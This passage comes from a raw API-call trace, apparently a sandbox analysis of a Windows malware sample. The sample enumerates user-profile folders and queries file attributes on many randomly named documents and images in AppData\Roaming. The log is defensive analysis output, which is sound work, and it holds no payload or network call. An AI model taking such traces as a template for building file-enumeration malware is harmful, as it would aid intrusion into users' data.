fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2910a926, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0038.987] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2910a926, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0038.987] FindClose (in: hFindFile=0x37c730 | out: hFindFile=0x37c730) returned 1 [0038.988] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.988] FindFirstFileW (in: lpFileName="c:\\users\\default\\links\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.128] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c426d0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c426d0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x280f9488, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x244)) returned 1 [0039.129] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.130] FindFirstFileW (in: lpFileName="c:\\users\\default\\local settings\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.130] FindFirstFileW (in: lpFileName="c:\\users\\default\\music\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.130] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27ccee00, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0039.131] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.131] FindFirstFileW (in: lpFileName="c:\\users\\default\\my documents\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.131] FindFirstFileW (in: lpFileName="c:\\users\\default\\nethood\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.131] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4ef6cd7a, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xe87815c0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0x7b6f310, ftLastWriteTime.dwHighDateTime=0x1d2da0d, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0039.132] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4c6063a4, ftCreationTime.dwHighDateTime=0x1ca0453, ftLastAccessTime.dwLowDateTime=0x82363a0a, ftLastAccessTime.dwHighDateTime=0x1ca0458, ftLastWriteTime.dwLowDateTime=0x82389c62, ftLastWriteTime.dwHighDateTime=0x1ca0458, nFileSizeHigh=0x0, nFileSizeLow=0x400)) returned 1 [0039.132] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), fInfoLevelId=0x0, lpFileInformation=0x1cec54 | out: lpFileInformation=0x1cec54*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6baa150, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6baa150, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x19e18206, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x14)) returned 1 [0039.133] FindFirstFileW (in: lpFileName="c:\\users\\default\\pictures\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.133] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27c5c9df, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0039.134] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.134] FindFirstFileW (in: lpFileName="c:\\users\\default\\printhood\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.134] FindFirstFileW (in: lpFileName="c:\\users\\default\\recent\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.134] FindFirstFileW (in: lpFileName="c:\\users\\default\\saved games\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.134] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\saved games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27fa2825, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0039.135] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.135] FindFirstFileW (in: lpFileName="c:\\users\\default\\searches\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.141] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x20c)) returned 1 [0039.141] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xf8)) returned 1 [0039.141] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6c426d0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c426d0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xf8)) returned 1 [0039.141] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.142] FindFirstFileW (in: lpFileName="c:\\users\\default\\sendto\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.142] FindFirstFileW (in: lpFileName="c:\\users\\default\\start menu\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.142] FindFirstFileW (in: lpFileName="c:\\users\\default\\templates\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0039.142] FindFirstFileW (in: lpFileName="c:\\users\\default\\videos\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.142] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27c5c9df, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0039.142] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0039.143] FindClose (in: hFindFile=0x37be48 | out: hFindFile=0x37be48) returned 1 [0039.143] FindFirstFileW (in: lpFileName="c:\\users\\default user\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0xffffffff [0039.143] GetFileAttributesExW (in: lpFileName="c:\\users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1cf1b4 | out: lpFileInformation=0x1cf1b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b61335c, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b61335c, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b61335c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0039.143] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37be48 [0039.143] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0039.144] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37e3a0 [0039.144] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\0JkVowKW67ScNs.xlsx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\0jkvowkw67scns.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa83b3240, ftCreationTime.dwHighDateTime=0x1d41f55, ftLastAccessTime.dwLowDateTime=0xc1a28130, ftLastAccessTime.dwHighDateTime=0x1d41ce8, ftLastWriteTime.dwLowDateTime=0xc1a28130, ftLastWriteTime.dwHighDateTime=0x1d41ce8, nFileSizeHigh=0x0, nFileSizeLow=0xe1d0)) returned 1 [0039.144] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\3tOLu7_.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\3tolu7_.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95231540, ftCreationTime.dwHighDateTime=0x1d412d7, ftLastAccessTime.dwLowDateTime=0x97f18f20, ftLastAccessTime.dwHighDateTime=0x1d413f6, ftLastWriteTime.dwLowDateTime=0x97f18f20, ftLastWriteTime.dwHighDateTime=0x1d413f6, nFileSizeHigh=0x0, nFileSizeLow=0xc084)) returned 1 [0039.145] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\8hEZdFxVBi.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\8hezdfxvbi.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe681890, ftCreationTime.dwHighDateTime=0x1d41e5a, ftLastAccessTime.dwLowDateTime=0x139e3db0, ftLastAccessTime.dwHighDateTime=0x1d41fbb, ftLastWriteTime.dwLowDateTime=0x139e3db0, ftLastWriteTime.dwHighDateTime=0x1d41fbb, nFileSizeHigh=0x0, nFileSizeLow=0x8784)) returned 1 [0039.145] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37c730 [0039.151] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37ed28 [0039.151] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\\\*", lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0x37ede0 [0039.151] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\collab\\\\*", lpFindFileData=0x1cc9c0 | out: lpFindFileData=0x1cc9c0) returned 0x37eea8 [0039.152] FindClose (in: hFindFile=0x37eea8 | out: hFindFile=0x37eea8) returned 1 [0039.152] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\forms\\\\*", lpFindFileData=0x1cc9c0 | out: lpFindFileData=0x1cc9c0) returned 0x37eea8 [0039.152] FindClose (in: hFindFile=0x37eea8 | out: hFindFile=0x37eea8) returned 1 [0039.152] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\\\*", lpFindFileData=0x1cc9c0 | out: lpFindFileData=0x1cc9c0) returned 0x37ee20 [0039.153] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb963630, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xeb963630, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0x924964c0, ftLastWriteTime.dwHighDateTime=0x1d35e26, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0039.153] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), fInfoLevelId=0x0, lpFileInformation=0x1ccc14 | out: lpFileInformation=0x1ccc14*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb989790, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xeb989790, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0x924964c0, ftLastWriteTime.dwHighDateTime=0x1d35e26, nFileSizeHigh=0x0, nFileSizeLow=0xa)) returned 1 [0039.153] FindClose (in: hFindFile=0x37ee20 | out: hFindFile=0x37ee20) returned 1 [0039.153] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\\\*", lpFindFileData=0x1cc9c0 | out: lpFindFileData=0x1cc9c0) returned 0x37eea8 [0039.154] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\\\*", lpFindFileData=0x1cc460 | out: lpFindFileData=0x1cc460) returned 0x37ef80 [0039.154] FindClose (in: hFindFile=0x37ef80 | out: hFindFile=0x37ef80) returned 1 [0039.154] FindClose (in: hFindFile=0x37eea8 | out: hFindFile=0x37eea8) returned 1 [0039.154] FindClose (in: hFindFile=0x37ede0 | out: hFindFile=0x37ede0) returned 1 [0039.154] FindClose (in: hFindFile=0x37ed28 | out: hFindFile=0x37ed28) returned 1 [0039.155] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\flash player\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37ed38 [0039.164] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\flash player\\assetcache\\\\*", lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0x37ee00 [0039.165] FindClose (in: hFindFile=0x37ee00 | out: hFindFile=0x37ee00) returned 1 [0039.165] FindClose (in: hFindFile=0x37ed38 | out: hFindFile=0x37ed38) returned 1 [0039.165] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\headlights\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37ed38 [0039.166] FindClose (in: hFindFile=0x37ed38 | out: hFindFile=0x37ed38) returned 1 [0039.166] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\linguistics\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37ed38 [0039.166] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\linguistics\\dictionaries\\\\*", lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0x37ed78 [0039.166] FindClose (in: hFindFile=0x37ed78 | out: hFindFile=0x37ed78) returned 1 [0039.166] FindClose (in: hFindFile=0x37ed38 | out: hFindFile=0x37ed38) returned 1 [0039.166] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\logtransport2\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37ed38 [0039.167] FindClose (in: hFindFile=0x37ed38 | out: hFindFile=0x37ed38) returned 1 [0039.167] FindClose (in: hFindFile=0x37c730 | out: hFindFile=0x37c730) returned 1 [0039.167] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\BNzgUVXC_-s-x2x5xNT.png" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bnzguvxc_-s-x2x5xnt.png"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc0b81010, ftCreationTime.dwHighDateTime=0x1d417d8, ftLastAccessTime.dwLowDateTime=0xd8931e60, ftLastAccessTime.dwHighDateTime=0x1d41697, ftLastWriteTime.dwLowDateTime=0xd8931e60, ftLastWriteTime.dwHighDateTime=0x1d41697, nFileSizeHigh=0x0, nFileSizeLow=0xbe16)) returned 1 [0039.168] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\bYUv.ots" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\byuv.ots"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc81cfc50, ftCreationTime.dwHighDateTime=0x1d41f29, ftLastAccessTime.dwLowDateTime=0x2f450650, ftLastAccessTime.dwHighDateTime=0x1d41f04, ftLastWriteTime.dwLowDateTime=0x2f450650, ftLastWriteTime.dwHighDateTime=0x1d41f04, nFileSizeHigh=0x0, nFileSizeLow=0xcdc0)) returned 1 [0039.168] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\d-BXDU.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\d-bxdu.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87be0d70, ftCreationTime.dwHighDateTime=0x1d4129a, ftLastAccessTime.dwLowDateTime=0xb58f36c0, ftLastAccessTime.dwHighDateTime=0x1d41b37, ftLastWriteTime.dwLowDateTime=0xb58f36c0, ftLastWriteTime.dwHighDateTime=0x1d41b37, nFileSizeHigh=0x0, nFileSizeLow=0x16b70)) returned 1 [0039.168] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\dihBYw6hJ7.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\dihbyw6hj7.rtf"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd637bc0, ftCreationTime.dwHighDateTime=0x1d41062, ftLastAccessTime.dwLowDateTime=0x8fce2420, ftLastAccessTime.dwHighDateTime=0x1d41414, ftLastWriteTime.dwLowDateTime=0x8fce2420, ftLastWriteTime.dwHighDateTime=0x1d41414, nFileSizeHigh=0x0, nFileSizeLow=0x11f8)) returned 1 [0039.168] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\e371x5yB-BXL9.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\e371x5yb-bxl9.jpg"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa303bbf0, ftCreationTime.dwHighDateTime=0x1d41715, ftLastAccessTime.dwLowDateTime=0x74198990, ftLastAccessTime.dwHighDateTime=0x1d414af, ftLastWriteTime.dwLowDateTime=0x74198990, ftLastWriteTime.dwHighDateTime=0x1d414af, nFileSizeHigh=0x0, nFileSizeLow=0x1696e)) returned 1 [0039.169] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\identities\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37eea0 [0039.169] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\identities\\{74a13782-b361-4204-9daa-0a3d49da4337}\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37d7d8 [0039.169] FindClose (in: hFindFile=0x37d7d8 | out: hFindFile=0x37d7d8) returned 1 [0039.169] FindClose (in: hFindFile=0x37eea0 | out: hFindFile=0x37eea0) returned 1 [0039.169] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\JpLHr.ppt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\jplhr.ppt"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5135dd60, ftCreationTime.dwHighDateTime=0x1d41fa0, ftLastAccessTime.dwLowDateTime=0x8acd6d60, ftLastAccessTime.dwHighDateTime=0x1d416d9, ftLastWriteTime.dwLowDateTime=0x8acd6d60, ftLastWriteTime.dwHighDateTime=0x1d416d9, nFileSizeHigh=0x0, nFileSizeLow=0x11a01)) returned 1 [0039.170] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\KKJxf.odt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\kkjxf.odt"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x796dc2c0, ftCreationTime.dwHighDateTime=0x1d415b4, ftLastAccessTime.dwLowDateTime=0xc798ed0, ftLastAccessTime.dwHighDateTime=0x1d41053, ftLastWriteTime.dwLowDateTime=0xc798ed0, ftLastWriteTime.dwHighDateTime=0x1d41053, nFileSizeHigh=0x0, nFileSizeLow=0x65e7)) returned 1 [0039.170] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\kSYMgW4ng7d7 1NA.pdf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ksymgw4ng7d7 1na.pdf"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe4425f10, ftCreationTime.dwHighDateTime=0x1d41704, ftLastAccessTime.dwLowDateTime=0xf185990, ftLastAccessTime.dwHighDateTime=0x1d41c5c, ftLastWriteTime.dwLowDateTime=0xf185990, ftLastWriteTime.dwHighDateTime=0x1d41c5c, nFileSizeHigh=0x0, nFileSizeLow=0xb6c5)) returned 1 [0039.170] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37eff8 [0039.170] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\flash player\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37d8d8 [0039.171] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\\\*", lpFindFileData=0x1ccf20 | out: lpFindFileData=0x1ccf20) returned 0x37d918 [0039.172] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\\\*", lpFindFileData=0x1cc9c0 | out: lpFindFileData=0x1cc9c0) returned 0x37d958 [0039.172] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\\\*", lpFindFileData=0x1cc460 | out: lpFindFileData=0x1cc460) returned 0x37da90 [0039.173] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\\\*", lpFindFileData=0x1cbf00 | out: lpFindFileData=0x1cbf00) returned 0x37dad0 [0039.173] FindClose (in: hFindFile=0x37dad0 | out: hFindFile=0x37dad0) returned 1 [0039.174] FindClose (in: hFindFile=0x37da90 | out: hFindFile=0x37da90) returned 1 [0039.174] FindClose (in: hFindFile=0x37d958 | out: hFindFile=0x37d958) returned 1 [0039.174] FindClose (in: hFindFile=0x37d918 | out: hFindFile=0x37d918) returned 1 [0039.174] FindClose (in: hFindFile=0x37d8d8 | out: hFindFile=0x37d8d8) returned 1 [0039.174] FindClose (in: hFindFile=0x37eff8 | out: hFindFile=0x37eff8) returned 1 [0039.174] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mkaLZ5.bmp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mkalz5.bmp"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9885a10, ftCreationTime.dwHighDateTime=0x1d413bb, 